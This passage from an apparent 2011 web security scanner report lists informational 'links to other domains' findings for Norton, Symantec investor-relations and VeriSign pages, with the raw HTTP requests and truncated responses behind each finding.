s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:22 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 58568 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]... <div id="globalNavMainInner1"> <a href="http://www.symantec.com/norton"> Norton</a>...[SNIP]... <div id="globalNavMainInner2"> <a href="http://www.symantec.com/business"> Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href="http://www.symantec.com/partners"> Partners</a>...[SNIP]... <div id="globalNavMainInner5"> <a href="http://www.symantec.com/about"> About Symantec</a>...[SNIP]... <div class="lftNavMainNav"> <a href="http://www.symantec.com/norton/downloads/index.jsp" title="" class="lftNavArrowMargin"> <span>...[SNIP]... <div class="lftNavMainNav"> <a title="" class=" lftNavArrowMargin" href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN"> Find My Order </a>...[SNIP]... <li> <a target="_parent" href="http://www.symantec.com/home_homeoffice/support/special/upgrade2007/"> Norton Update Center</a>...[SNIP]... <div class="lwrTopLfPnl_link"> <a onclick="var w = window.open(href, '', 'scrollbars=yes,location=no,menuBar=no,resizable=no,status=no,toolbar=no,width=850,height=550,left=200,top=200'); if(w.blur) w.focus(); return false;" title="" href="http://www.symantec.com/norton/support/kb/web_view.jsp?wv_type=public_web&docurl=20080417101717EN"> How do I find my version?</a>...[SNIP]... <div class="smallBusinessUpgrade positioning"> <a href="https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_estore"> <img width="305" height="75" src="//buy-static.norton.com/estore/images/en/Non-Product/Ad_Objects/bnr_smb_renew_now_305.png"/>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/legal.jsp"> Legal Notices</a>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/privacy.jsp"> Privacy Policy</a>...[SNIP]... <span><a target="_blank" href="http://www.myNortonAccount.com "> Norton Account</a>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/eulas"> License Agreements </a>...[SNIP]... <span id="item4" class="footerItemBorder"><a target="_blank" href="http://www.symantec.com/feedback/"> Contact Us</a>...[SNIP]...
14.4. http://community.norton.com/norton/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://community.norton.com
Path:
/norton/
Issue detail
The page was loaded from a URL containing a query string:http://community.norton.com/norton/?category.id=nis The response contains the following links to other domains:http://connect.facebook.net/en_US/all.js http://norton.i.lithium.com/i/rank_icons/admin.gif http://norton.i.lithium.com/skins/HEAD/C105409C876B69B68E91EDA257001258/nortonen1446997136.css http://norton.i.lithium.com/skins/images/36DAF0C87B7C6C4940B22274E6384D9C/base/images/button_lithium_logo.png http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png http://norton.i.lithium.com/skins/images/BB41541B9291E6F322D353043685E371/base/images/button_fbconnect_secondary.png http://norton.i.lithium.com/skins/images/C0E5B9B4C7EE14DAAFFEA36D02AE9AF5/base/images/icon_help.png http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js http://twitter.com/nortonforumsUSA http://twitter.com/nortononline http://www.facebook.com/Norton http://www.lithium.com/ http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_facebook_16.gif http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_twitter_16.gif http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_youtube_16.gif http://www.symantec.com/favicon.ico http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n http://www.symantec.com/script/omniture/om_code.js http://www.symantec.com/script/omniture/s_code.js http://www.youtube.com/Norton
Request
GET /norton/?category.id=nis HTTP/1.1 Host: community.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:45 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 61789 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... </link> <link href="http://norton.i.lithium.com/skins/HEAD/C105409C876B69B68E91EDA257001258/nortonen1446997136.css" rel="stylesheet" type="text/css"> </link> <link rel="shortcut icon" href="http://www.symantec.com/favicon.ico" type="image/x-icon" /> <meta name="om.environment" content="prod" />...[SNIP]... <![endif]--><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... <a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_37" href="#"><img class="" id="display" src="http://norton.i.lithium.com/skins/images/C0E5B9B4C7EE14DAAFFEA36D02AE9AF5/base/images/icon_help.png"/> </a>...[SNIP]... <a class="lia-link-navigation lia-button-facebook" id="lithiumFacebookConnectIcon" href="/t5/Norton-Users-Discussion-Forum/ct-p/nis?category.id=nis"><img class="" id="display_0" src="http://norton.i.lithium.com/skins/images/BB41541B9291E6F322D353043685E371/base/images/button_fbconnect_secondary.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_43" href="/t5/Announcements/bd-p/Announcements"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_1" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_46" href="/t5/Norton-Internet-Security-Norton/bd-p/nis_feedback"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_2" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_49" href="/t5/Norton-360/bd-p/Norton_360"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_3" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_52" href="/t5/Norton-Online-Family/bd-p/OnlineFamily"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_4" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_55" href="/t5/Norton-for-Mac/bd-p/norton_mac"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_5" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_58" href="/t5/Norton-Online-Backup/bd-p/NOBU_forum"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_6" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_61" href="/t5/Other-Norton-Products/bd-p/other"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_7" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_64" href="/t5/Forum-Feedback/bd-p/forum_feedback"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_8" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_67" href="/t5/Product-Suggestions/bd-p/Suggestions"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_9" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <div style="margin-bottom: 10px; margin-top: 5px;"><a target="_blank" href="http://www.facebook.com/Norton"> <img height="16" width="16" style="vertical-align: middle;" alt="Norton on Facebook" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_facebook_16.gif"/> </a> <a target="_blank" href="http://www.facebook.com/Norton"> Be a fan on Facebook</a>...[SNIP]... <div style="margin-bottom: 10px;"><a target="_blank" href="http://www.youtube.com/Norton"> <img height="16" width="16" style="vertical-align: middle;" alt="Subscribe on YouTube" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_youtube_16.gif"/> </a> <a target="_blank" href="http://www.youtube.com/Norton"> Subscribe on YouTube</a>...[SNIP]... <div style="margin-bottom: 10px;"><a target="_blank" href="http://twitter.com/nortononline"> <img height="16" width="16" style="vertical-align: middle;" alt="Follow us on Twitter" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_twitter_16.gif"/> </a> <a target="_blank" href="http://twitter.com/nortonforumsUSA"> Follow us on Twitter</a>...[SNIP]... <a target="_blank" href="http://de.community.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="Deutsches Norton Forum" src="http://www.symantec.com/favicon.ico"/> </a>...[SNIP]... <a target="_blank" href="http://fr.community.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="Communaut.. Norton" src="http://www.symantec.com/favicon.ico"/> </a>...[SNIP]... <a target="_blank" href="http://communityjp.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="................................." src="http://www.symantec.com/favicon.ico"/> </a>...[SNIP]... <a target="_blank" href="http://bbs.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt=".................." src="http://www.symantec.com/favicon.ico"/> </a>...[SNIP]... <span class="UserName lia-user-name"> <img class="lia-user-rank-icon-left" title="Administrator" alt="Administrator" id="display_11" src="http://norton.i.lithium.com/i/rank_icons/admin.gif"/> <a class="lia-link-navigation lia-page-link lia-user-name-link" style="color:#FF0000" target="_self" id="link_72" href="/t5/user/viewprofilepage/user-id/17">...[SNIP]... <div class="LithiumLogo lia-component-common-widget-lithium-logo" class="LithiumLogo"> <a class="lia-link-navigation" title="Social CRM & Community Solutions Powered by Lithium" target="_blank" id="lithiumLogoLink" href="http://www.lithium.com/"> <img class="" title="Social CRM & Community Solutions Powered by Lithium" alt="Powered by Lithium" id="display_12" src="http://norton.i.lithium.com/skins/images/36DAF0C87B7C6C4940B22274E6384D9C/base/images/button_lithium_logo.png"/> </a>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js"> </script>...[SNIP]...
14.5. http://investor.symantec.com/phoenix.zhtml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://investor.symantec.com
Path:
/phoenix.zhtml
Issue detail
The page was loaded from a URL containing a query string:http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-irhomeNews The response contains the following links to other domains:http://admin.brightcove.com/js/BrightcoveExperiences.js http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAwMTU4fENoaWxkSUQ9LTF8VHlwZT0z&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxMDYyfENoaWxkSUQ9LTF8VHlwZT0z&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxNDQ5fENoaWxkSUQ9LTF8VHlwZT0z&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzN3xUeXBlPTI=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzNnxUeXBlPTI=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTY4OHxUeXBlPTI=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTYxNHxUeXBlPTI=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTM3ODl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1 http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2 http://widgets.twimg.com/j/2/widget.js http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif http://www.media-server.com/m/acs/7b9834c9d1bb29b5dd8ae8afb63ff0c5 http://www.veracast.com/webcasts/citigroup/tech2011/22205132.cfm https://enroll1.icsdelivery.com/symc/Default.aspx
Request
GET /phoenix.zhtml?c=89422&p=irol-irhomeNews HTTP/1.1 Host: investor.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=58 Date: Fri, 09 Sep 2011 21:42:06 GMT Content-Length: 39751 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjA2IFBNPC90aW1lU3RhbXA+PHRpbWVUaWxsQ0NCTlJlZnJlc2g+NjA8L3RpbWVUaWxsQ0NCTlJlZnJl...[SNIP]... <link rel="stylesheet" type="text/css" href="client/89/89422/css/ccbnIR.css" /><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"> </script>...[SNIP]... </div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"> </script>...[SNIP]... <noscript><img src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif" title="Javascript must be enabled to use this feature." border="0" /> </noscript>...[SNIP]... <noscript><img src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif" title="Javascript must be enabled to use this feature." border="0" /> </noscript>...[SNIP]... <td width="100%" valign="middle"><a class="ccbnLnk" href="http://www.veracast.com/webcasts/citigroup/tech2011/22205132.cfm" target="_new" > Click here for webcast</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzNnxUeXBlPTI=&t=1" target="_new"> Q1 FY12 Earnings New Release</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzN3xUeXBlPTI=&t=1" target="_new"> Q1 FY12 Supplemental Information</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxNDQ5fENoaWxkSUQ9LTF8VHlwZT0z&t=1" target="_new"> Q1 2012 Earnings ... Prepared Remarks</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxMDYyfENoaWxkSUQ9LTF8VHlwZT0z&t=1" target="_new"> Historical Compares for Modified Segment Reporting</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAwMTU4fENoaWxkSUQ9LTF8VHlwZT0z&t=1" target="_new"> Q1 FY12 Foreign Currency Update</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTM3ODl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_new"> Convertible Note Dilution FAQ</a>...[SNIP]... <td width="100%" valign="middle"><a class="ccbnLnk" href="http://www.media-server.com/m/acs/7b9834c9d1bb29b5dd8ae8afb63ff0c5" target="_new" > Click here for webcast</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTYxNHxUeXBlPTI=&t=1" target="_new"> Presentation</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTY4OHxUeXBlPTI=&t=1" target="_new"> Transcript</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Symantec...s Strategy</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Corporate Pitch</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Corporate Fact Sheet</a>...[SNIP]... <li><a href="http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en" target="_blank"> Shareholder Services (Computershare)</a>...[SNIP]... <li><a href="https://enroll1.icsdelivery.com/symc/Default.aspx" target="_blank"> Request Electronic Delivery</a>...[SNIP]... </table><img src="http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif" /> </div>...[SNIP]...
14.6. http://investor.symantec.com/phoenix.zhtml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://investor.symantec.com
Path:
/phoenix.zhtml
Issue detail
The page was loaded from a URL containing a query string:http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751 The response contains the following links to other domains:http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM3NnxUeXBlPTI=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5NnxUeXBlPTI=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5OHxUeXBlPTI=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDcwMTB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1 http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1 http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2 http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_win.gif http://www.corporate-ir.net/media_files/templates/webcast/tr_pwrby_hrz_rgb_pos.gif https://enroll1.icsdelivery.com/symc/Default.aspx
Request
GET /phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751 HTTP/1.1 Host: investor.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 18700 Cache-Control: private, max-age=179 Date: Fri, 09 Sep 2011 21:42:04 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjAzIFBNPC90aW1lU3Rh...[SNIP]... </script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"> </script>...[SNIP]... <span class="ccbnTblTxt"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /> <br />...[SNIP]... <td align="left" width="3%"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_win.gif" alt="Listen to the Webcast in Windows Media Player"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /> <br />...[SNIP]... <td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /> </td>...[SNIP]... <td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5NnxUeXBlPTI=&t=1" target="_new"> Press Release</a>...[SNIP]... <td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM3NnxUeXBlPTI=&t=1" target="_new"> Presentation</a>...[SNIP]... <td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5OHxUeXBlPTI=&t=1" target="_new"> FAQ</a>...[SNIP]... <td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDcwMTB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_new"> Symantec to Acquire VeriSign...s Security Business Transcript</a>...[SNIP]... <BR><IMG src="http://www.corporate-ir.net/media_files/templates/webcast/tr_pwrby_hrz_rgb_pos.gif" alt=ThomsonReuters.com border=0 align=center VALIGN=TOP> <BR>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Symantec...s Strategy</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Corporate Pitch</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Corporate Fact Sheet</a>...[SNIP]... <li><a href="http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en" target="_blank"> Shareholder Services (Computershare)</a>...[SNIP]... <li><a href="https://enroll1.icsdelivery.com/symc/Default.aspx" target="_blank"> Request Electronic Delivery</a>...[SNIP]...
14.7. https://knowledge.verisign.ch/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport The response contains the following links to other domains:https://blogs.verisign.com/?tid=footer https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg https://products.verisign.com/geocenter/reseller/logon.do https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://verisign.com/partnersupport/worldwide/partnersupport.html https://www.verisign.be/ https://www.verisign.ch/?tid=header-logo https://www.verisign.co.jp/ https://www.verisign.co.nz/ https://www.verisign.co.uk/ https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to 